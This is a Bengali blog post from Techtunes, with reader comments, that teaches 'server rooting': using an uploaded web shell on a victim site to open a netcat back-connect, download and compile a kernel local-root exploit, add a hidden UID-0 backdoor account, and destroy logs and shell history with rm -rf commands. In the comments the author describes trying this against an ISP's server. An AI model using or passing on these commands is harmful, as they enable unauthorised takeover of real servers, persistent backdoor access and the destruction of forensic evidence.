ADs by Techtunes ADs
ADs by Techtunes ADs

সার্ভার রুটিং কি ? কিভাবে সার্ভার রুটিং করতে হয় ?

আজকে বলতে গেলে কঠিন একটা বিষয় নিয়েই লিখছি । যারা একদম প্রথম পড়ছেন তারা কিছু বুঝবেন না । যারা সিকিউরিটি নিয়ে অনেকদিন ধরেই পড়ে আছেন তাদের কাছে এটি মজার বিষয়। আচ্ছা কথা না বাড়িয়ে চলুন শুরু করি ।

ADs by Techtunes ADs

.................................................................10%3∞ .........................................................

সার্ভার রুটিং কি ?
রুট হল সব সার্ভার এর administrator । কেউ যদি রুট অ্যাক্সেস পেয়ে যায় তাহলে সে পুরো সার্ভার কে নিয়ন্ত্রন করতে পারবে। যেমন ধরুন ম্যাস ডিফেস কিংবা ক্রাশ করতে পারবে। অনেক হ্যাকিং গ্রুপ এ পন্থা অবলম্বন করে । সার্ভার রুটিং এর অনেকগুলো ভাগ আছে । আপনি যদি একদম এ নিয়ে শুরু করতে চান তাহলে  আপনার উইন্ডোজ পিসি  দিয়ে শুরু করাই ভাল হবে ।
একটি সার্ভারে ROOT করার তিনটি উপায় আছে
1 – With local Root.
2 – With SQL by reading same important files on it root password.
3 – With exploit on software (Buffer Overflow).
আমি আপনাদেরকে দেখাব উইন্ডোজ পিসি থেকে কিভাবে লিনাক্স এ রুট করতে হয় । আপনি এ ধরনের ইংরেজি অনেক টিউটোরিয়াল পাবেন কিন্তু  আপনার নিজের ভাষা তেই আপনি সবথেকে ভাল বুঝবেন ।

কাজের ধারা >>>>
যা যা লাগবে

> SHELLED SITE
> A LOCAL ROOT EXPLOIT
> NETCAT

Step 1 - Gathering informations
প্রথমে আপনার পিএইচপি শেল ওপেন করুন । আমি যেমন আমারটা করেছি ।

এখন আপনাকে জানতে হবে আপনার ভিক্টিম কি Kernel ব্যাবহার করে । এটি নিচের মত হতে পারে ।
Linux somehostingsite.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686
এখন আপনাকে কোন লোকাল রুট খুজে বের করতে হবে । যেমন আমার টা ছিল

2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2013 i686.
এসব খোজার জন্য আপনি
exploit-db, 1337day, th3-0utl4ws  এসব  সাইট ব্যাবহার করতে পারেন বা গুগল এ খুজলে হাজার হাজার পাওয়া যাবে ।
Step 2 - Backconnecting to the server
এর জন্য আপনার লাগবে
NetCat
Open port (Example. 443আমি আপনাকে পোর্ট ফরওয়ার্ডিং সেখাচ্ছি না ...... গুগল এ খুজলেই পেয়ে যাবেন !!)
আপনার  netcat খুলে টাইপ করুন :
-l -n -v -p 443
Hit "Enter"
এই কাজ কিন্তু cmd তে করতে হবে

তাহলে এটি রিপ্লাই দেবে এরকম  "listening on [any] 443 ..."

এবার আপনার শেল এ ফিরে যান । এরপর সেখানে আপনি "BackConnect function" পাবেন । এবার আপনার কাঙ্খিত পোর্ট নাম্বার লিখুন । আমি 443 ব্যাবহার করেছি । এরপর কানেক্ট করুন

ADs by Techtunes ADs

এটি আপনার netcat কে কানেক্ট করবে। আমি নিচের ছবির মতই কিছু পেয়েছি ।
 

Step 3 - Downloading exploit and executing it
এখন আমাদের প্রথম ধাপের উপকরন লাগবে । শেল আপ্লোড করার দুটি পন্থা আছে
1) Using shell uploader
2) Using 'wget' function (Requires backconnection)
আমি দুই নম্বরটা কে সহজ মনে করি
। এরপর আপনার রুত এর লিঙ্ক টি কপি করুন । আমার টা ছিল এরকম
http://localroot.th3-0utl4ws.com/xploits...8-164.zip
এখন আপনার নেটকাটে ফিরে যান এবং লিঙ্ক  টাইপ করুন  । তাহলে এটি সার্ভারে 
"2.6.18-164.zip" নামে ফাইল ডাউনলোড করল ।
আপনার exploit টি যদি
anyrandomname.c নামে ডাউনলোড হয় তাহলে আপনাকে এটি কম্পাইল করতে হবে ।
প্রথমে ডাউনলোড করুন এবং টাইপ করুন
gcc anyrandomname.c -o anyrandomname
তাহলে এটি কম্পাইল হয়ে যাবে ।


আপনি যদি এক্সপ্লইট কে যে কোন  নাম যেমন anyrandomname.zip ডাউনলোড করেন তাহলে টাইপ করুন
unzip anyrandomname.zip


এখন আপনি আপনার এক্সপ্লইট পাবেন  (Like mine "2.6.18-164")
এখন সবগুল ধাপ সম্পন্ন করার পর ............................

Type:

chmod 777 yourexploit'sname
আমি যেখানে  your exploit লিখলাম   সেখানে আপনি নিজের টা লিখবেন

এখন সর্বোপরি exploit রান করতে হবে এটি লিখে
./yourexploit'sname

To check if you got root type
id
or
whoami

Step 4 - Adding root user
মানে আসল অ্যাডমিন ছাড়া  অন্যদের  এখানে এখানে অ্যাড করা যাবে এটি খুব সহজ ।
এই কম্যান্ড ব্যাবহার করুন
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

কম্যান্ড এর ব্যাখা
Quote:adduser - এটি তখন ব্যাবহার করা হয় যখন কোন নতুন অ্যাকাউন্ট ওপেন হয়

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

ADs by Techtunes ADs

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 -  এটি আপনার ইউযারনেম .NOTE: root2 তে আপনি  ইচ্ছা মত নাম দিতে পারেন

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)
একটি উদাহরণ দেখুন

[[email protected] ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

আপনি ঠিকমত  করেছেন কিনা এইকমান্ড দিয়ে তা পরীক্ষা করতে পারেন

id root2
(Root2 is your username)

 GNY shell - http://www.4shared.com/office/jLmzLh83/GNYShell.html
NetCat - 
এটি সেটাপ এ অনেকের সমস্যা হতে পারে তাই সরাসরি লিঙ্ক দিলাম না এই লিঙ্ক এ যান
http://linhost.info/2011/05/netcat-for-windows/

Clearing Logs:

ADs by Techtunes ADs

এখন আমাদের সব ট্র্যাক মুছতে হবে
.rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

শেষ কথা
আপনি যদি হ্যাকিং এর প্রাথমিক বিষয় গুলো না যানেন তাহলে এই দিকে যাবেন না । এটি আপনার জন্য ক্ষতিকর হতে পারে
সমস্যা হলে বলবেন । আর এখান থেকে কিছু না বুঝলে আপনি অবশ্যই ভিডিও দেখবেন
এরকম সবকিছু >
http://www.facebook.com/CY133R  এ
আর আমি > http://www.facebook.com/techfreak.unknown
আল্লাহ হাফেয
...............................................................10%3∞ ................................................

 

ADs by Techtunes ADs
Level 0

আমি রাশেদ রাহুল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 8 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 53 টি টিউন ও 50 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

waw………tahole amio ki hacker ?

    Level 0

    @Rizwan Bin Sulaiman: ho.. pura CEH hacker apne.. aibar nachen.. ekta tutorial porlei hacker howa jay? (-_-)
    jatir kase amar proshno :v

vai ami to kichui bujhi nai

Level 0

যাহোক অনেক দিন পর আসল হ্যাকিং পদ্ধতি দেওয়ার জন্য ধন্যবাদ। Shelled site বলতে PHP shell code বুঝিয়াছেন না shell uploaded website বুঝিয়াছেন এটা বুঝতে পারছি না। আর মাঝে কিছুটা বাদ দিয়ে গিয়াছেন । একারণে যারা হ্যাকিং এর সাথে জড়িত নয় তারা হইত কিছুই বুঝতে পারছেনা। আর একটু বেশি লিখলে ভালো হতো নতুন দের জন্য। যা হোক এভাবে বোঝানও সম্ভব না।

Level 0

@Rizwan Bin Sulaiman
তোমরা এখনো অনেক ছোট এগুলো বোঝার জন্য । এটা লেবু দিয়ে বাতি জালানো বা কাগজ বাঁচানোর পদ্ধতি না ।
@rashed rahul উইন্ডোজ এর থেকে লিনাক্স হ্যাকিং এর জন্য ভালো আর সহজ
http://blog.hackplanet.in/2012/05/rooting-server-learn-ethical-hacking.html

মাথায় ঢুকল না।।

@all
দেখুন সার্ভার রুটিং অনেক পরের ব্যাপার । আপনাকে আগে sqli, rfi, xss, lfi জানতে হবে । কিভাবে শেল আপ্লোড করতে হয় তা জানতে হবে । কিছুটা বিদ্ঘুটে লাগতে পারে কিন্তু viDio টা দেখুন । না বুঝলে এরকম অনেক ভিডিও আপনারা পাবেন । কিন্তু root করার সময় কোন ভিপিএন বা প্রক্সি ব্যাবহার করবেন না ।
https://www.youtube.com/watch?v=dOpPbpUeeAo

Sensative baper nia keo tune korle chandi gorom hoe jai. Ei first apnar tune dekhe chandi gorom holo na. Osombob gusie tune korsen. valo lagse karon required person sara onna ra kisu bujbe na 😉
Sorasori priote.

Level 0

ভাই… এভাবে আর কত…??? পুরা হুবহু তুইলা দিছেন। গ্রুপ এর মান সম্মান সব ডুবাইবেন। অন্য রকম কিছু পোস্ট দেন যাতে সাধারন মানুষ উপকৃত হয়, অন্যথায় পোস্ট দিয়েন না

প্রমানঃ http://secrethacker-akshay.blogspot.com/2012/03/server-rooting-tutorial-and-adding-new.html

Level 0

আর নয়তো আপনার আই.ডি থেকে বাংলাদেশ সাইবার আর্মি নাম টা মুছে দিন। কারন উনাদের টিউটোরিয়াল গুলো খুব ই উচ্চ মানের এবং তাদের টিউটোরিয়াল নিয়ে কথা বলার অবকাশ ও থাকে না।

ছবিগুলো দুটো ব্লগ ঘুরে নেয়া। কিন্তু লেখা কপি পেস্ট না। ১০০% বাজি ।
আর আমি BCA তে নতুন যোগ দিয়েছি । এ লেখা এর আগে প্রকাশিত । তাই এর সাথে সম্পরকজুক্ত হতে পারেনা । আর BCA পাব্লিকালি কোন টিউটো্রিয়াল দেয় না । যেগুল দেয়া হয় বেশিরভাগ মেম্বার ৪ , ৫ টা ব্লগ ঘুরে তারপর বাংলা অনুবাদ করে খসড়া গ্রুপ এ দেন । এ ধরনের বিষয় খুবই সংবেদন শীল । আশা করি বুঝে শুনেই কথা বলবেন ।

    Level 0

    @rashed rahul: hahaha.. edit koresen lekha??? 100% ek silo + photo soho… amar kase google cache version ase.. jodi chan seta group e post kore dibo.. kinto ami BCA ke jothesto respect kori. asha kori next e tutorial er naam e copy paste off korben.. best of luck for ur future

@ cyber 71
আসলে আমি সার্ভার রুট এর জন্য সার্ভার পাথ তৈরি করেছিলাম ……… কিন্তু আমার targeT সার্ভার ছিল একটা ইন্টারনেট isp দের সার্ভার । আমি কয়েকটি যায়গায় কিছু ভুল করেছিলাম আর track ঠিকমত মুছিনি । তাই সমস্যা হয়েছিল…… পুরো কাজ করার পর সামান্য ভুল এর কারনে সফল হইনি … কিন্তু টেকনিক এ রকম ছিল । তাই টিউন করেছি …… আমি জানি আপনার মত দক্ষ অনেকেই আছেন যাদের হ্যাকিং নিয়ে গাযা খুরি গল্প ভাল লাগে না …… আর এটি রুট এর একদম প্রাথমিক পদ্ধতি । যায় হোক আপনি আমার হ্যাকিং নিয়ে অন্য লেখা পড়বেন তাহলে বুঝবেন আমি NooB না । আপনার সাথে পরিচিত হয়ে ভাল লাগলো ।
ভাল লাগলে প্রোফাইল বা পেজ এ চলে আসবেন কথা হবে
regards…
Rashed Rahul